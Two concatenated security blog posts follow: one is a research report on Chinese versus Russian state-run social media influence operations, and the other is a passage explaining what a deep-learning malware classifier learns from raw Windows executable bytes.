For most Americans, the influence campaign waged by the Russian state on Western social media platforms in 2016 was the first time they had ever encountered an information operation. Over the ensuing three years, investigations by the Department of Justice, academics, researchers, and others exposed the breadth, depth, and impact of the Russian influence campaign upon the American electorate.

While the experience of being targeted by an influence campaign was new for most Americans, these types of operations have been a critical component of many nations’ military and intelligence capabilities for years. Broadly, information or influence operations are defined by the RAND Corporation as “the collection of tactical information about an adversary as well as the dissemination of propaganda in pursuit of a competitive advantage over an opponent.”

For Russia, influence operations are part of a larger effort called “information confrontation.” According to the Defense Intelligence Agency:

In this study of Chinese influence operations, we also wanted to incorporate a term created by French researchers in a seminal 2018 joint research report — “information manipulation.” Information manipulation, as defined by the two French agencies, is “the intentional and massive dissemination of false or biased news for hostile political purposes.”

According to the French researchers, nation-state information manipulation includes three criteria:

  1. A coordinated campaign
  2. The diffusion of false information or information that is consciously distorted
  3. The political intention to cause harm

As the researchers of this paper discuss, it is important — especially in the case of Chinese state-run information manipulation campaigns — to distinguish the political intent and national strategies underlying these campaigns as different from simply another perspective on the news.

We will use both the terms “influence operation” and “information manipulation” in this report and want to be sure the definitions and criteria for each are well articulated for the reader.

Both the Russian and Chinese state-run media assert themselves as simply countering the mainstream English-language media’s narrative and bias against their nations and people. English-language, state-run media for both countries hire fluent, often Western-educated journalists and hosts, and have become effective at leveraging legitimate native English-language journalists and television hosts.

While using English-language state media to seed the message of their information manipulation campaigns, what distinguishes Russian and Chinese approaches are their tactics, strategic goals, and efficacy. In this report, we will focus on the English-language social media aspects of China’s information manipulation and demonstrate how and why China’s campaigns are different from Russia’s.

Research Scope

Our research focused on the English-language social media activity of six major state-run propaganda organizations from October 1, 2018 through January 21, 2019, which included over 40,000 posts. We selected these six organizations — Xinhua, People’s Daily, China Global Television (CGTN), China Central Television (CCTV), China Plus News, and the Global Times — because they:

  • Are highly digitized
  • Possess accounts on multiple English language social media platforms
  • Are associated with Chinese intelligence agencies and/or English language propaganda systems

Because our intent was to map out Chinese state-run influence campaigns targeting the American public, we evaluated only English language posts and comments, as the posts in Chinese were unlikely to affect most Americans. Further, our research focused on answering two fundamental questions about Chinese influence operations:

  1. Does China employ the same influence tactics in the English-language social media space as it does domestically?
  2. How do Chinese state-run influence operations differ from Russian ones? In what ways are they similar and different, and why?

We searched for patterns of automated dissemination, scrutinized relationships among reposts and top reposting accounts, examined account naming conventions, and profiled post topics and hashtags.

Further, we also included the extensive profiling of and comparisons with Russia’s state-run influence operations. Thus far, Russia’s influence operations have been the most widely studied, and comparisons are necessary both for context and to demonstrate that not all social media influence campaigns are alike. Russia uses a specific set of tools and techniques designed to support Russia’s strategic goals. As we will demonstrate in this report, China’s social media influence campaigns employ different tactics and techniques because China’s strategic goals are different from Russia’s.

Editor’s Note: Due to terms of service restrictions, we are unable to provide details on the full range of social media activities used by the Chinese state in this report. We have listed specific instances where possible.

The Russian Model of Social Media Influence Operations

Russian attempts to leverage English-language social media to undermine faith in democratic processes, support pro-Russian policies or preferred outcomes, and sow division within Western societies have been well documented over the past several years.

Research on Russian information manipulation and social media operations has been critical to identifying the threat and countering the negative impacts on democratic societies. However, the intense focus on Russian campaigns has led to many to assume that because Russia was (arguably) so effective at manipulating social media, other nations must use the same tactics. This is not the case. Russia’s social media operations are unique to Russia’s strategic goals, domestic political and power structures, and the social media landscape of 2015 to 2016.

In terms of its relationship with Western democracies, Russia has a single primary goal under which others fall. This goal is to create a “polycentric” international system where the interests and policy goals of the Russian state are supported and respected. This essentially involves the wholesale reorienting of the current, Western-dominated international system. Regarding Russia’s efforts toward the United States in particular, this means “challenging the resolve of NATO,” manipulating and creating distrust in the U.S. electoral system, and exacerbating disagreements and divisions between the U.S. and the European Union.

This strategy and these goals drive the tactics Russia used in its social media influence operations.

First, the Russian state employed a nominally “private” company, the Internet Research Agency, to run social media influence operations. The Internet Research Agency was funded by Concord Management and Consulting, a company controlled by a man known as “Putin’s chef” (Yevgeniy Prigozhin), who has long-standing ties to Russian government officials. Prigozhin has even been described by some as “among the president’s [Putin’s] closest friends.”

This is a critical distinction to note when comparing state-run influence operations campaigns. In Russia, individuals like Prigozhin, who are close to President Putin but not to government officials, provide the means for the Russian government to engage in social media operations while maintaining distance and deniability for the regime. This is a distinct and distinguishing feature of Russian social media influence campaigns, compared to other nations.

The effective use of “front” companies and organizations (including both Concord Management and the Internet Research Agency) is a distinctive feature of Russian influence operations.

Second, Russian social media influence tactics have evolved over the past three years. As former Internet Research Agency employee Vitaly Bespalov described it:

Essentially, in the early days of the Internet Research Agency, writers would be hired to create and propagate “fake news” and content that supported broader Russian strategic messages and goals. Content from Russian state-run media was also widely propagated by Russian English-language social media accounts.

However, Recorded Future’s research into Russian social media operations before, during, and immediately after the 2018 U.S. midterm elections revealed that at least a subset of Russian-attributed accounts has moved away from propagating “fake news.” Instead, these accounts, which can be classified as “right trolls,” propagate and amplify hyperpartisan messages, or sharply polarized perspectives on legitimate news stories.

Our research indicated that these Russian accounts regularly promulgated content by politicians and mainstream U.S. news sources, such as Fox News, MSNBC, and CNBC. They also regularly propagated posts by hyperpartisan sites, such as the Daily Caller, Hannity, and Breitbart. The vast majority of these proliferated stories and posts were based in fact, but presented a hyperpartisan, or sharply polarized, perspective on those facts.

This evolution, even if just among a subset of larger Russian state-directed English-language social media operations, is also a unique technique of Russian operations. From the limited reporting available on Iranian influence operations, in the summer of 2018, Reuters discovered a network of social media accounts that “were part of an Iranian project to covertly influence public opinion in other countries.” The accounts were run by an organization called the International Union of Virtual Media (IUVM), and propagated “content from Iranian state media and other outlets aligned with the government in Tehran across the internet,” and acted as “large-scale amplifier for Iranian state messaging.”

While this evolution and expansive weaponization of many different types of content may be a result of the length of time which the Russian government has been conducting social media influence operations, it is also a distinct feature of Russian operations.

Third, using social media operations to “undermine unity, destabilise democracies, erode trust in democratic institutions,” and sow general popular discontent and discord are also uniquely Russian techniques designed to support uniquely Russian strategic goals. Again, Russia’s strategic goals are rooted in the desire to reorient and disrupt the entire Western-dominated international system. Therefore, we assess that the fact that Russian social media influence operations also seek to destabilize, erode trust, promote chaos, and sow popular discontent completely aligns with this overarching disruptive goal.

We believe Russian social media influence operations are disruptive and destabilizing because that is Russia’s primary strategic goal. National interests and strategy drive social media influence operations in the same way that they drive traditional intelligence, military, and cyber operations. As a result, each nation’s influence operations use different tactics and techniques because the broad strategic goals they are supporting are all different. As we will discuss below, Chinese social media operations are different and use techniques different from Russian ones because China’s strategic goals are different from Russia’s.

The Chinese Domestic Model of Social Media Influence Operations

As documented in several research histories of Chinese state control over the internet, including “Censored: Distraction and Diversion Inside China’s Great Firewall,” and “Contesting Cyberspace in China: Online Expression and Authoritarian Resilience,” since at least the late 1990s, the Chinese state pioneered internet censorship and social media influence operations.

Internet control and surveillance was initially introduced under the guise of the Golden Shield Project (金盾工程), a massive series of legal and technological initiatives meant to improve intelligence assessments and surveillance capabilities of the national police force. Among the techniques developed at the time was a system for blocking and censoring content known as the “Great Firewall.” The term “Great Firewall” was coined in a June 1997 Wired magazine article in which an anonymous Communist Party official stated that the firewall was “designed to keep Chinese cyberspace free of pollutants of all sorts, by the simple means of requiring ISPs [internet service providers] to block access to ‘problem’ sites abroad.”

Since this time, the techniques of information control have expanded well beyond the simple blocking employed by early iterations of the Great Firewall. The information-control regime in China has evolved to include a dizzying array of techniques, technologies, and resources:

This tool set, combined with the now-ubiquitous mass physical surveillance systems, place China at the forefront of integrating information technology, influence operations, surveillance, and censorship in a model referred to by two scholars from MERICS as “IT-based authoritarianism.”

In addition to the constraints imposed by the Great Firewall and content censorship, the Chinese state also employs a series of active disinformation and distortion measures to influence domestic social media users. One of the most widely studied has been the so-called “50 Cent Party.”

The 50 Cent Party is a group of people hired by the Chinese government to “surreptitiously post large numbers of fabricated social media comments, as if they were the genuine opinions of ordinary Chinese people.” The name is derivative of a rumor that these fake commentators were paid 50 Chinese cents per comment (this has been largely disproven).

This fabrication of social media comments and sentiment is largely known by the term “astroturfing.” Among scholars of the Chinese domestic social media environment, there is much disagreement regarding what the goals or objectives of government-paid astroturfers are.

One study by professors at Harvard, Stanford, and UC San Diego, published in April 2017, determined that one in every 178 social media posts are fabricated by the government and that comments and campaigns are focused and directed against specific topics or issues. Additionally, these scholars have assessed that domestic social media influence operations focus primarily on “cheerleading” or presenting or furthering a positive narrative about the Chinese state:

Conversely, a separate set of scholars at the University of Michigan, who also examined posts from the 50 Cent Party astroturfers, determined that at least one in every six posts on Chinese domestic social media was fabricated by the government. Further, these scholars argued that less than 40 percent of astroturfed comments could be classified as “cheerleading” and that the rest were a combination of vitriol, racism, insults, and rage against events or individuals. They additionally argue that censors and state-sponsored influence campaigns focus much of their resources on “opinion leaders” and users with large numbers of followers as opposed to simply intervening based on content.

While this debate continues to evolve in the examination of China’s domestic social media environment, to date, nobody has thoroughly examined whether these same techniques are used by the Chinese government in the foreign language space. Given its extensive history and experience in domestic social media influence operations, the question arises of how the Chinese government uses foreign social media to influence the American public.

China’s Strategic Goals

Similarly to the Russian government, the Chinese Communist Party has sought to influence foreign thoughts and opinions of China for decades. In a paper published by the Hoover Institution in November 2018, over 30 of the West’s preeminent China scholars collaborated on disseminating their findings from a working group on China’s influence operations abroad.

The Chinese government has sought to use state and Party resources to influence how Americans view China is not new. What separates the influence operations of 2019 from those of the past 40 years are due to two factors — first, the ubiquity and impact of social media, and second, the expanded intent and scope.

First is the proliferation of social media platforms, the increasingly broad range of services offered, and the ability to engage with (and not just broadcast to) the intended audience. Over the course of the past decade, social media platforms have evolved to play an ever-expanding role in the lives of users. In the United States, Americans get their news equally from social media and news sites, spend more than 11 hours per day on average “listening to, watching, reading, or generally interacting with media,” and express varying levels of trust in the reliability of information on social media. Further, social media companies increasingly offer users a wider array of services, pulling more of the average user’s time and attention to their platforms.

Second, the intent and scope of China’s influence operations has evolved. As the Hoover Institution paper identified, President Xi has expanded and accelerated a set of policies and activities that “seek to redefine China’s place in the world as a global player.” At the same time, these activities seek to undermine traditional American values (like the freedoms of press, assembly, and religion) that Chinese leadership increasingly views as threatening to their own system of authoritarian rule.

Former Australian prime minister and China expert Malcolm Turnbull described these expanded and accelerated influence activities as “covert, coercive, or corrupting,” underscoring the transformation in scope and focus of these operations under President Xi.

At the national policy level, China’s goals in conducting influence operations are driven by strategic goals and objectives. First and foremost, China seeks a larger role in and greater influence on the current international system. While scholars disagree on the extent to which China, under Xi Jinping, wishes to reshape the current post-World War II international system, most argue that China does not wish to supplant the United States as the world’s only hegemon; instead, it seeks to exercise greater control and influence over global governance. As summarized in the 2018 U.S. Department of Defense Annual Report to Congress on China:

Greater influence within the international system, regional stability under Chinese conditions, development of a more capable military, and reunification with Taiwan all fall under Xi Jinping’s so-called “Chinese dream of national rejuvenation.” The “Chinese dream” is portrayed by Chinese government and media as unquestionably good and positive for the international community, a message that provides the foundation for foreign influence operations. Advocates of the “Chinese dream” urge that a prosperous and strong China is good for the world and does not pose a threat to any other country, because China will never seek hegemony or territorial expansion.

In his closing speech to the 13th National People’s Congress (NPC) in March 2018, President Xi reinforced China’s commitment to “build a community of shared future for mankind, take responsibility in defending world peace and stability, and make contributions to deliver better lives for all people around the globe.”

Even further, Xi articulated the implications of the “Chinese dream” as unfailingly positive and advantageous for the world at large:

The contrast in the scope and tone of China’s goals in relation to Russia’s strategic goals is a critical point. China’s message to the world is positive, and argues that China’s rise will be beneficial, cooperative, and constructive for the global community. In comparison, Russia’s strategic goals are more combative, revolutionary, and disruptive — all traits that are characteristic of Russian social media influence operations since 2015.

‘Grabbing the Right to Speak’

The media environment in China is nearly completely state-owned, controlled, or subservient to the interests of the state. Almost all national and provincial-level news organizations are state-run and monitored, and the Communist Party’s Propaganda Department issues weekly censorship guidelines. It is not unusual for the top newspapers and websites in China to all publish the same exact headline.

Newspaper Front Pages

Images from the front pages of the People’s Daily, the PLA Daily, the Guangming Daily, the Beijing Daily, the Tianjin Daily, and the Chongqing Daily, as identified by Quartz.

This duplication typically occurs around events of strategic importance to the Communist Party and Chinese leadership, such as the annual meetings of the National People’s Congress (NPC) and the 2018 China-Africa Summit.

Further, research has demonstrated that propaganda, the foundation for Chinese state-run foreign influence operations, can still be highly effective, even if it is perceived as overt. This is for the following five reasons:

  1. People are poor judges of true versus false information, and they do not necessarily remember that particular information was false.
  2. Information overload leads people to take shortcuts in determining the trustworthiness of messages.
  3. Familiar themes or messages can be appealing, even if they are false.
  4. Statements are more likely to be accepted if backed by evidence, even if that evidence is false.
  5. Peripheral cues, such as an appearance of objectivity, can increase the credibility of propaganda.

State-run media occupies a specific role in the Party’s efforts to influence foreign opinions of China. The U.S. Department of State described China’s state-run media as the “publicity front” for the Communist Party in its 2017 China Country Report on Human Rights Practices:

Critical to promoting the Party’s will and protecting its authority are two widely distributed and heavily digitized news services: Xinhua and the People’s Daily. Xinhua News Agency is the self-described “official news agency” of China and has been described by Reporters Without Borders as “the world’s biggest propaganda agency.” Although Xinhua attempts to brand itself as another wire news service, it plays a much different role from that of other wire news services (such as Reuters, Associated Press, and so on) and functions completely at the behest and will of the Party. Even further, Xinhua can be seen as an extension of China’s civilian intelligence service, the Ministry of State Security (MSS):

It is not clear the extent to which the MSS guides Xinhua reporting or publishing; however, with the knowledge that overseas correspondents are actually intelligence officers, it is impossible to remove the MSS from a role in Xinhua reporting and messaging overseas.

Xinhua has an extensive English-language site and active presence on several U.S.-based social media platforms. In January 2018, the New York Times conducted an investigation in which it discovered that Xinhua had purchased social media followers and reposts from a “social marketing” company called Devumi. Our research focused primarily on content propagation and reposts, so we were unable to confirm the findings regarding Xinhua’s followers. However, over the course of our research on top reposters and propagators, we noted that many of the top reposter accounts mimicked the bot setup and techniques used by Devumi. These techniques are easy to replicate, and while we assess that the top 20 Xinhua reposters are either broadcast or spam bots, we were unable to determine the ownership of the accounts.

The People’s Daily is part of a collection of papers and websites that identifies itself as “China’s largest newspaper group.” Similar to Xinhua, the People’s Daily is used by both the MSS and China’s military intelligence department (formerly known as the 2PLA) as cover for sending intelligence agents abroad and presents itself as offering a benign, Chinese perspective on global news. The People’s Daily also operates an English-language news site and operates regularly on several U.S.-based social media platforms.

It is important to note that while the intelligence services have not traditionally held a prominent role in influence operations, they are, as Peter Mattis noted, one of “multiple professional systems operating in parallel” within China to achieve national-level goals and objectives.

The intelligence system, and the MSS in particular, has a role in shaping and influencing Western perceptions of and policies on China, just as the state-run media, United Front Work Department, and propaganda systems all do. While the strategic objectives are determined, prioritized, and disseminated from Xi Jinping down, each system and ministry uses its own tools and resources to achieve those goals. Some of these resources and tools overlap, compete with each other, and even degrade the effectiveness of those leveraged by other ministries and systems.

The sphere of influence operations is no different. Each system has similar and dissimilar tools, but the same objectives.

The Chinese Model of English-Language Social Media Influence Operations

In late 2018 and early 2019, we studied all of the accessible English-language social media posts from accounts run by Xinhua, the People’s Daily, and four other Chinese state-run media organizations geared toward a foreign audience on Western social media platforms. Our research indicates that China has taken a vastly different approach to influencing foreign audiences from its approach in the domestic social media space. While the seed material for the influence campaigns is the same state-run media content, there is likely no English-language equivalent to the 50 Cent Party or army of social media commenters.

Chinese state-run accounts are active social media users. On average, over the date range we studied, state-run accounts posted 60 to 100 times per day across several Western platforms. Xinhua, CGTN, and the Global Times were the most active content generators on these social media platforms, and posts by the People’s Daily, Xinhua, and CGTN were favorited or liked at the highest rates.

Case Study: Instagram

Examining how Xinhua and the People’s Daily utilize Instagram is good example of how the Chinese state exploits Western social media. Both Xinhua and the People’s Daily have verified accounts on Instagram and are regular users. On average, over this date range, both accounts posted around 26 times per day.

Xinhua Instagram

Instagram page for Xinhua.

People's Daily Instagram

Instagram page for the People’s Daily.

Both accounts have a large number of followers and follow few other accounts. The posts — photographs and videos — are overwhelmingly positive and present any number of variations on a few core themes:

  • China’s vast natural beauty
  • Appealing cultural traditions and heritage
  • Overseas visits by Chinese leaders or visits of foreign leaders to China
  • The positive impact China is having on the world in science, technology, sports, etc.
  • Breaking global news

People's Daily Instagram Post

Instagram post from the People’s Daily.

In terms of audience engagement, a metric used to assess the impact of social media, these two Chinese accounts are useful to compare to Russian IRA-linked accounts over the past several years, laid out in the table below.

Facebook Post Engagement

Modified table from the University of Oxford’s December 2018 report analyzing audience engagement with IRA-linked Facebook posts.

Over nearly four months of Instagram data that we used for this research, Xinhua and People’s Daily posted a combined 6,072 posts, with likes totaling 5,431,009, and 17,039 comments. If we assume that these numbers stayed relatively consistent over the course of 2018, then the total likes for these two accounts would amount to roughly 16,293,027, and the comments would add up to 51,117.

Facebook and Instagram are two different platforms, specializing in communication in two different mediums, but the numbers are still useful for comparing the techniques utilized and the efficacy of state-directed influence operations. Comments are leveraged more widely by users on Facebook, and that platform has two additional means of propagating content (shares and emoji reactions) that Instagram does not.

To compare Instagram usage by both Chinese and Russian state-supported influence campaigns, we used data analysis published in the New Knowledge disinformation report from December 2018. To approximate the Russia numbers for a standard four-month period, we divided the total numbers into segments to get a rough average for comparison. Again, as we do not have access to the actual data used by New Knowledge, this table below is intended to represent a rough comparison to estimate efficacy. Further, we have chosen to profile only two of the most prolific Chinese state-run accounts, and not the entire suite of accounts leveraged for influence operations.

The below is an estimation of audience engagement from Russian and Chinese state-run influence campaigns on Instagram.

Instagram Russia China
Average Number of Posts Over a 114-Day Time Frame 20,194 6,072
Number of Likes 31,844,639 5,431,009
Average Likes per Post 1,568 1,360
Comments 698,203 17,039
Comments per Post 34 3
Total Followers 3,391,116 1,084,000
Total Engagements 32,542,842 5,448,048

These two Chinese influence profiles reached a level of audience engagement roughly one-sixth as large as the entire Russian IRA-associated campaign targeting the United States on Instagram.

Further, Xinhua also leveraged paid advertisements to promote specific posts during this time frame. The Instagram ad tracker does not allow a user to view all advertisements paid for by a specific account, so the total number of Instagram advertisements used by Chinese influence accounts is unknown at this time. However, the active advertisements we were able to identify followed the core themes identified above and further promoted the image of Xinhua as a wire news service, and not state-run propaganda.

Instagram Advertisements

Instagram Advertisements

Paid advertisements on Instagram from Xinhua. (Source: Instagram)

Use of Paid Advertisements

Throughout our research time frame, we also observed the use of paid advertisements across multiple platforms. Depending on the platform, paid advertisements are indicated to users via a “sponsored,” “promoted,” or similar notation within the post itself. Each platform uses a unique algorithm to place advertisements within the feeds of its users, based on the individual user’s preferences, likes, dislikes, and more.

Most platforms provide a mechanism for both identifying whether a post is a paid advertisement and allowing a user to research the ads purchased by specific accounts. Advertisements are not searchable ad infinitum, and the length of time a particular platform retains the data accessible to users varies. These limitations constrained our ability to quantify which percentage of posts on social media published by Chinese state-run influence accounts were paid advertisements versus organic posts.

In terms of broad, cross-platform trends, we observed Xinhua, People’s Daily, CGTN, and China Daily running paid advertisements. Consistent with this story from the Digital Forensics Research Lab, we observed overtly political advertisements from Chinese state-run influence accounts across a number of platforms. Many of these paid advertisements were identified and retained by Facebook as part of their archive of “ads related to politics or issues of national importance,” launched on May 7, 2018. For Facebook, advertisements of this kind are required to be authorized and reviewed, but also to carry a specific “paid for by” disclaimer in addition to the notation indicating the post is a paid advertisement.

However, none of the advertisements run by Xinhua or China Daily on Facebook that were retained as part of the “political” archive over our research period were annotated in the Facebook platform as “paid for by” at the time they were run. Therefore, users viewing the posts during the period in which they were active would not have known that the advertisements were deemed overtly “political” or of national importance, or even that they were ultimately purchased by the Chinese state.

Facebook Advertisements

Facebook Advertisements

Facebook Advertisements

Three examples of paid advertisements later identified by Facebook as “political” or of “national importance.”

From our data set, the advertisements that were retained by Facebook as part of its political archive were substantively different from other advertisements purchased during that same time frame and not archived or tagged. The majority of paid advertisements from these state-run accounts appealed to users to like or follow the account for access to global and China-specific news.

Facebook Advertisements

Facebook Advertisements

Facebook Advertisements

Three examples of paid advertisements not identified by Facebook as “political” or of “national importance.”

Paid advertisements across other platforms demonstrated a similar distribution of “political” and general interest posts. However, other platforms did not provide tools to distinguish paid posts that were “political” or of “national interest” from more general posts, or illuminate who ultimately purchased the advertisement.

Sentiment Analysis

As detailed in our section on China’s strategic goals, China seeks to convince the world that its development and rise is unfailingly positive, beneficial, cooperative, and constructive for the global community. While sentiment analysis can be inexact and possesses a mixed track record, it is most useful on large data sets like this one. We used the VADER sentiment analysis technique and code from their Github repository. Typical scoring thresholds used in sentiment analysis are:

  • Positive: Greater than 0.05
  • Neutral: From -0.05 to 0.05
  • Negative: Less than -0.05

Sentiment Score

Sentiment score of Chinese influence accounts posts from October 2018 through January 2019.

On average, Chinese state-run influence accounts projected positive sentiment to platform users, which is consistent with the strategic goal of portraying China’s development and rise as positive and beneficial for the global community.

Social Media Messages

We also analyzed the content and hashtags associated with state-run influence accounts. Again, across social media platforms, the content and messages propagated were overwhelmingly positive. Top hashtags and specific content varied by account, month, and media outlet; however, hashtags for Chinese senior leaders (such as Xi Jinping and Li Keqiang) remained among the most popular for all accounts over the entire research duration. This included hashtags for official travel and state visits (such as #Xiplomacy and #XiVisit).

Additionally, each month, a particular event was highlighted universally across the social media accounts we analyzed.

Month Event
October CIIE, China International Import Expo in Shanghai
November G20, Group of 20 2018 Summit in Argentina
December 40th Anniversary of China’s Reform and Opening Up
January Chinese Spring Festival

Each account typically presented its own “take” or message depending on the specialization of the media outlet. For example, the People’s Daily propagated a greater percentage of apolitical, human interest, positive China stories (using hashtags such as #heartwarmingmoments and #AmazingChina) than other outlets, while Xinhua propagated a higher percentage of breaking news stories.

While the messages that these accounts propagated align strategically to China’s articulated goals, they also demonstrated a responsiveness to international events. In particular, the December 2018 arrest of Huawei Chief Financial Officer Meng Wanzhou in Canada. For the prior two months, Huawei was mentioned minimally in social media posts — only by the Global Times and China Plus News. Beginning in December, Huawei became a top topic of influence messaging for all accounts, a trend which continued to the end of the study’s time frame.

This alignment of highlighted events and topics is likely a result of the regular rules issued by state propaganda authorities each week to both domestic and foreign outlets.

2018 US Midterm Elections

We assess that these Chinese state-run influence accounts did not attempt a large-scale campaign to influence American voters in the run-up to the November 6, 2018 midterm elections. However, on a small scale, we observed engagement by all of the state-run influence accounts in disseminating breaking news and biased content surrounding President Trump and China-related issues.

The most active account, in terms of opinionated or biased election-related content, was the Global Times, which has long had a reputation for “aggressive editorials” that “excoriat[e] any country or foreign politician whom China has an issue with.” On November 6, the Global Times propagated an article that referred to President Trump as “unstable” and his policies as “volatile and erratic.” The article closed with a refrain that has become familiar across Chinese state-run media since the advent of the trade war:

Based on our research, what made this Chinese-propagated content different from Russian election influence attempts was threefold:

  1. The scale of this content and its dissemination was very limited. Most of these posts were not widely reposted, favorited, or liked, and the actual impact was likely minimal on American voters.
  2. Chinese content largely did not express a preference for one candidate or party over another. Aside from the comments about President Trump, which have been widely disseminated in Chinese media since 2017, the articles expressed concern or perspectives in relation to issues that China was concerned with, such as the trade war.
  3. The propagated elections-related content was primarily generated by the Global Times and Xinhua. Using state-run media as seed data is in contrast to the Russian technique during the 2018 midterms of disseminating hyperpartisan perspectives on legitimate news stories from domestic American news sites.


Our research demonstrates that social media influence campaigns are not a one-size-fits-all technique. The Russian state has used a broadly negative, combative, destabilizing, and discordant influence operation because that type of campaign supports Russia’s strategic goals to undermine faith in democratic processes, support pro-Russian policies or preferred outcomes, and sow division within Western societies. Russia’s strategic goals require covert actions and are inherently disruptive, therefore, the social media influence techniques employed are secretive and disruptive as well.

The Chinese state has a starkly different set of strategic goals, and as a result, Chinese state-run social media influence operations use different techniques. Xi Jinping has chosen to support China’s goal to exert greater influence on the current international system by portraying the government in a positive light, arguing that China’s rise will be beneficial, cooperative, and constructive for the global community. This goal requires a coordinated global message and technique, which presents a strong, confident, and optimistic China.

Our research has revealed that the manner in which China has attempted to influence the American population is different from the techniques they use domestically. While researchers have demonstrated that China does want to present a positive image of the state and Communist Party domestically, the techniques of censorship, filtering, astroturfing, and comment flooding are not viable abroad. We discovered no English language equivalent to the 50 Cent Party in Western social media. This is not a conclusion that China’s policies, messages, propaganda, and media do not have social media defenders.

Instead, we believe that the Chinese state has employed a plethora of state-run media to exploit the openness of American democratic society and insert an intentionally distorted and biased narrative “for hostile political purposes.” As expertly explained in the Hoover Institution paper, these influence operations are not benign in nature, but support China’s goals to “redefine its place in the world as a global player” by “exploiting America’s openness in order to advance its aims on a competitive playing field that is hardly level.” China uses the openness of American society to propagate a distorted and utopian view of its government and party.

Over the long term, scholars believe that current Chinese leadership actually view core American values and freedoms, such as those of press, assembly, and religion, as “direct challenges to its own form of one-party rule.” It is therefore imperative that we not be complacent when confronting Chinese information manipulation on social media. Identifying the goals and techniques of these influence operations is the first step toward countering their deleterious effects.

At this point, it is valuable to revisit why influence operations and propaganda can be so persuasive, and to use this research to counter those arguments. Again, according to research from RAND, propaganda (and resulting influence campaigns) are effective for the following five reasons:

  1. People are poor judges of true versus false information, and they do not necessarily remember that particular information was false.
  2. Information overload leads people to take shortcuts in determining the trustworthiness of messages.
  3. Familiar themes or messages can be appealing, even if they are false.
  4. Statements are more likely to be accepted if backed by evidence, even if that evidence is false.
  5. Peripheral cues, such as an appearance of objectivity, can increase the credibility of propaganda.

For those who use social media, knowledge is the greatest tool in combating influence operations. Social media users bear a greater responsibility to themselves and the American public to develop better means of detecting and dismissing influence attempts. Corporate, public, and private users should use both this research and other research on state-run influence operations to refine those means and tools to counter the exploitation of our open society and values by foreign governments.

The post Beyond Hybrid War: How China Exploits Social Media to Sway American Opinion appeared first on Recorded Future.


What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.


  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.


Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).

Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.

Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

